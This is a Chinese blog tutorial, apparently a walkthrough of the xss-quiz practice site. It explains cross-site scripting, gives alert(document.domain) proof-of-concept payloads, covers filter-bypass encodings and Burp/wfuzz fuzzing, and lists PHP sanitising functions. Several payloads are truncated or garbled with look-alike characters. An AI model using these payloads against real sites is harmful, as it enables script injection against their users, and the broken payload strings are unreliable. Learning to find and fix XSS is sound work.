• 跨站脚本攻击xss攻击


    跨站脚本攻击(Cross Site Scripting)。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览网页时,嵌入其中的Web里面的Script代码会被执行。

    http://xss-quiz.int21h.jp/
    1.探测XSS过程
    构造一个独一无二且不会被识别为恶意代码的字符串来提交到页面,例如:123qweasdzxc
    使用浏览器审查工具进行代码审查,寻找构造的字符串是否在页面中显示
    闭合文本标签利用XSS Payload:“

    2.标签属性中的XSS
    闭合引用script: ">
    闭合引用事件: " οnmοuseοver=alert(document.domain)>

    3.选择列表的XSS
    闭合标签script:
    在这里插入图片描述

    4.隐藏提交参数中的XSS
    hidden标签的XSS: ">
    在这里插入图片描述

    5.限制输入长度的XSS
    修改input标签中的maxlength为1000后,在search中输入">%0a
    Payload长度为40字节

    6.HTML事件中的XSS
    "οnmοuseοver=“alert(document.domain)”
    ">

    7.空格分隔属性的XSS
    注意没有引号: 1111 οnmοuseοver=alert(document.domain)

    8.Javascript伪协议触发XSS
    Javascript代码添加到客户端的方式是把它放置在伪协议说明符javascript后的URL中。这个特殊的协议类型生命了URL主体是任意的Javascript代码,它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句,必须使用分隔符隔开。javascript:var now=new Date();“

    The time is:

    ”+now
    Payload: javascript:alert(document.domain);

    9.绕过过滤
    双写: ">
    过滤on事件绕过(tab建不是空格):”>1
    IE特性两个反引号: οnmοuseοver=alert(document.domain)
    css特性绕过: background-color:#f00;background:url(“javascript:alert(document.domain);”);
    双斜线+16进制绕过:\x3cscript\x3ealert(document.domain);\x3c/script\x3e
    unicode绕过: \u003cscript\u003ealert(document.domain);\u003c/script\u003e
    编码加密解密:http://www.jsfuck.com
    wfuzz检测,字典位置:/usr/share/wordlists/wfuzz/Injections
    https://github.com/TheKingOfDuck/easyXssPayload
    Burpsuite Xss探测:截断后->send to intruder->Positions->右侧Add&->Payload type:Runtime file->选择对应的Xss.txt

    10.PHP中的XSS过滤函数
    htmlspecialchars()
    htmlentities()
    strip_tags()
    自定义xss filter

    11.XSS发生的位置
    GET型URL中的XSS:如果在URL中提交的参数值,在页面中显示。很有可能就存在XSS
    POST表单中的XSS:如果在表单中提交的参数值,在页面中显示。很有可能就存在XSS
    JSON中的XSS
    自定义HTTP头中的XSS:如果在HTTP自定义头中提交的参数值,在页面中显示。很有可能就存在XSS

  • 相关阅读:
    中国高等职业教育产业发展战略咨询与前景规划建议报告2022-2028年新版
    [重庆思庄每日技术分享]-SQLLOADER express加载数据报 KUP-04040
    大模型系列-fastgpt,ollama搭建本地知识库
    不是吧,还有人连Java最强大的技术之一:反射还没搞懂?赶紧码住
    计算机视觉之目标检测训练数据集(皮卡丘)《2》
    Python实现SSA智能麻雀搜索算法优化XGBoost回归模型(XGBRegressor算法)项目实战
    spring如何解决循环依赖
    Ubuntu 20.04源码安装sysbench 1.0.20,源码安装sysstat v12.7.2
    【css】背景换颜色
    【计算机网络】什么是WebSocket?
  • 原文地址:https://blog.csdn.net/jiatong151/article/details/134336446